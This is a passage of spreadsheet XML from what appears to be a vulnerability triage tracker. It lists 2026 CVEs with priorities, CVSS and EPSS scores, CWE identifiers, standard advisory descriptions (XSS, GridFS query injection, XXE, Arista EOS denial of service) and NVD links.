      <c r="C1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69642</t>
        </is>
      </c>
      <c r="D1015" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1015" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1015" s="5" t="inlineStr"/>
      <c r="H1015" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1015" s="5" t="inlineStr"/>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L1015" s="5" t="inlineStr"/>
      <c r="M1015" s="5" t="inlineStr"/>
      <c r="N1015" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1015" s="5" t="inlineStr"/>
      <c r="Q1015" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1015" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69642</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77490</t>
        </is>
      </c>
      <c r="D1016" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1016" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1016" s="5" t="inlineStr"/>
      <c r="H1016" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1016" s="5" t="inlineStr"/>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr"/>
      <c r="L1016" s="5" t="inlineStr"/>
      <c r="M1016" s="5" t="inlineStr"/>
      <c r="N1016" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1016" s="5" t="inlineStr"/>
      <c r="Q1016" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1016" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77490</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81201</t>
        </is>
      </c>
      <c r="D1017" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1017" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1017" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1017" s="5" t="inlineStr"/>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr">
        <is>
          <t>monster_menus_project:monster_menus</t>
        </is>
      </c>
      <c r="L1017" s="5" t="inlineStr"/>
      <c r="M1017" s="5" t="inlineStr"/>
      <c r="N1017" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1017" s="5" t="inlineStr"/>
      <c r="Q1017" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1017" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Monster Menus allows Stored XSS. This issue affects Monster Menus versions: from 0.0.0 to 9.5.3.</t>
        </is>
      </c>
      <c r="S1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81201</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81900</t>
        </is>
      </c>
      <c r="D1018" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1018" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr">
        <is>
          <t>concretecms:concrete_cms</t>
        </is>
      </c>
      <c r="L1018" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr"/>
      <c r="Q1018" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1018" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.3 applied only trim() to the YouTube block's stored width and height values and printed them into iframe HTML attributes without escaping or integer casting, resulting in stored cross-site scripting. A user with edit_block permission could inject an event handler that executed script for visitors rendering the page, acting with administrative privileges where the victim was an administrator. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks sh4d0byss for reporting.</t>
        </is>
      </c>
      <c r="S1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81900</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84560</t>
        </is>
      </c>
      <c r="D1019" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1019" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1019" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1019" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr"/>
      <c r="Q1019" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1019" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. An app may gain unauthorized access to Bluetooth.</t>
        </is>
      </c>
      <c r="S1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84560</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88034</t>
        </is>
      </c>
      <c r="D1020" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1020" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1020" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1020" s="5" t="inlineStr">
        <is>
          <t>mongodb:c\+\+_driver</t>
        </is>
      </c>
      <c r="L1020" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr"/>
      <c r="Q1020" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R1020" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB C++ Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may obtain stored file content beyond the intended target or cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable.</t>
        </is>
      </c>
      <c r="S1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88034</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88036</t>
        </is>
      </c>
      <c r="D1021" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1021" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1021" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1021" s="5" t="inlineStr">
        <is>
          <t>mongodb:c_driver</t>
        </is>
      </c>
      <c r="L1021" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr"/>
      <c r="Q1021" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R1021" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB C Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may obtain stored file content beyond the intended target or cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable.</t>
        </is>
      </c>
      <c r="S1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88036</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88976</t>
        </is>
      </c>
      <c r="D1022" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1022" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1022" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="inlineStr"/>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr"/>
      <c r="L1022" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr"/>
      <c r="Q1022" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>Plate is a rich-text editor with AI and shadcn/ui. Prior to 53.3.11, and in the discontinued 54.0.0-beta.0 through 54.0.0-beta.1 builds, Plate core HTML deserialization APIs parse supplied HTML strings in the active document. When an application passes untrusted or cross-user HTML to these APIs, certain HTML attributes can trigger browser behavior before the HTML is converted into editor nodes. This can allow attacker-controlled script to execute in the consuming application's origin when another user loads the deserialized content. This issue is fixed in version 53.3.11.</t>
        </is>
      </c>
      <c r="S1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88976</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92584</t>
        </is>
      </c>
      <c r="D1023" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E1023" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="inlineStr"/>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr"/>
      <c r="L1023" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr"/>
      <c r="Q1023" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 (current revision e01e41ecc) contains a stored cross-site scripting vulnerability. The unauthenticated view-counter endpoint objects/videoAddViewCount.json.php reaches VideoStatistic::save(), which writes the caller's User-Agent (via getUserAgentInfo(), which returns unrecognized agent strings verbatim) directly into the `app` column of the videos_statistics table without invoking the sanitizing setter setApp(); normalizeApp() only truncates the value to 45 characters. The video owner's and administrator's statistics page (view/videoViewsInfo.php) renders this field in a DataTables 1.12.1 column with an unescaped renderer, and DataTables assigns cell content using innerHTML, so attacker-supplied HTML is parsed and executed in the privileged user's authenticated session when the statistics page is viewed. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="S1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92584</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18061</t>
        </is>
      </c>
      <c r="D1024" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1024" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1024" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr">
        <is>
          <t>amazon:advanced_jdbc_wrapper</t>
        </is>
      </c>
      <c r="L1024" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr"/>
      <c r="Q1024" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of XML external entity references in the RemoteQueryCachePlugin in AWS Advanced JDBC Wrapper 3.3.0 through 4.2.0 might allow an actor with write access to the shared cache infrastructure to disclose sensitive files from application hosts that read cached query results, including stored database and IAM role credentials, via crafted XML data in a cached column value.
To remediate this issue, users should upgrade to version 4.3.0 or later.</t>
        </is>
      </c>
      <c r="S1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18061</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18069</t>
        </is>
      </c>
      <c r="D1025" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1025" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1025" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr"/>
      <c r="L1025" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr"/>
      <c r="Q1025" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to obtain ownership of arbitrary file system objects due to a time-of-check to time-of-use (TOCTOU) race condition.</t>
        </is>
      </c>
      <c r="S1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18069</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73436</t>
        </is>
      </c>
      <c r="D1026" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1026" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1026" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr"/>
      <c r="L1026" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr"/>
      <c r="Q1026" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-1284</t>
        </is>
      </c>
      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with OSPFv2 and OSPFv2 segment routing configured, a specially crafted OSPFv2 packet from an adjacent OSPF neighbor may cause OSPF to restart unexpectedly.</t>
        </is>
      </c>
      <c r="S1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73436</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73457</t>
        </is>
      </c>
      <c r="D1027" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1027" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1027" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="inlineStr"/>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr"/>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr"/>
      <c r="Q1027" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>Under certain circumstances on affected platforms running Arista EOS with gRPC Network Packet Sampling Interface (gNPSI) enabled, the gNPSI client credentials might be logged in clear text in local or remote accounting logs to authenticated users.</t>
        </is>
      </c>
      <c r="S1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73457</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73463</t>
        </is>
      </c>
      <c r="D1028" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1028" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1028" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr"/>
      <c r="L1028" s="5" t="inlineStr"/>
      <c r="M1028" s="5" t="inlineStr"/>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr"/>
      <c r="Q1028" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1028" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS, when multiple gRPC Network Security Interface (gNSI) transports are configured, a race condition in the gNSI Authz service may cause a policy rotation to fail silently. An authenticated user whose access was revoked by the new policy may retain unauthorized access to gRPC interfaces. This does not affect Bootz.
This issue was discovered internally by Arista, and the company is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73463</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77190</t>
        </is>
      </c>
      <c r="D1029" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1029" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1029" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="inlineStr"/>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr"/>
      <c r="L1029" s="5" t="inlineStr"/>
      <c r="M1029" s="5" t="inlineStr"/>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr"/>
      <c r="Q1029" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1029" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS, an unauthenticated attacker who is network-adjacent to the switch and able to connect to a device with PIM Sparse Mode and MLAG configured, can send malformed messages that cause the Pimsm agent to terminate unexpectedly. The Pimsm agent is automatically restarted, but repeated attacks can cause the agent to restart continuously, resulting in a sustained denial of service.</t>
        </is>
      </c>
      <c r="S1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77190</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82056</t>
        </is>
      </c>
      <c r="D1030" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E1030" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1030" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1030" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1030" s="5" t="inlineStr"/>
      <c r="M1030" s="5" t="inlineStr"/>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr"/>
      <c r="Q1030" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1030" s="5" t="inlineStr">
        <is>
          <t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t>
        </is>
      </c>
      <c r="S1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
